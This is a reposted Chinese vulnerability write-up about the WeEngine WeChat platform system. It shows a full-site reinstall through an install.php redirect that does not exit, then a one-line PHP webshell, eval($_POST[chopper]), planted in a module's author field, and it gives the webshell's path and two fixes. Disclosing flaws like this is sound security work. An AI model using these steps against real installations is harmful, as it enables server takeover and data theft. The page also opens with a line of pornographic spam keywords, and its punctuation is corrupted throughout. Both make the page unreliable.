久久国产成人av_抖音国产毛片_a片网站免费观看_A片无码播放手机在线观看,色五月在线观看,亚洲精品m在线观看,女人自慰的免费网址,悠悠在线观看精品视频,一级日本片免费的,亚洲精品久,国产精品成人久久久久久久

分享

微擎-微信公眾平臺自助引擎系統(tǒng)整站重裝+SQL注入getshell

 quasiceo 2016-07-07

微擎-微信公眾平臺自助引擎系統(tǒng)整站重裝+SQL注入getshell

2014-08-23 21:25

http://www./源碼下載,,量還是挺大的,。驗證為v0.52,,漏洞應(yīng)該是版本通殺,。



http://bbs./forum.php?mod=viewthread&tid=1155

在/install.php文件中26~28行代碼如下:

if(file_exists(IA_ROOT . '/data/install.lock') && $action != 'finish') {

header('location: ./index.php');

}



如果滿足條件,,則跳轉(zhuǎn)到index.php,但header并沒有阻止程序繼續(xù)往下執(zhí)行,。通過構(gòu)造post包,,可以實現(xiàn)整站重裝。



http://127.0.0.1/weixin/member.php?act=login&

admin/111111進行登錄,,在全局設(shè)置---模塊管理---模塊設(shè)計中添加一個新的模塊

在作者框內(nèi)填寫一句話木馬*/eval($_POST[chopper]);/*,,生成模塊模板



webshell地址:

http://127.0.0.1/weixin/source/modules/test/module.php



漏洞證明:

如上

修復(fù)方案:

1.安裝完后自動刪除install.php文件,或滿足條件處跳轉(zhuǎn)后退出,;

2.sql注入處正確過濾,。

    本站是提供個人知識管理的網(wǎng)絡(luò)存儲空間,所有內(nèi)容均由用戶發(fā)布,,不代表本站觀點,。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,,謹防詐騙,。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊一鍵舉報,。
    轉(zhuǎn)藏 分享 獻花(0

    0條評論

    發(fā)表

    請遵守用戶 評論公約

    類似文章 更多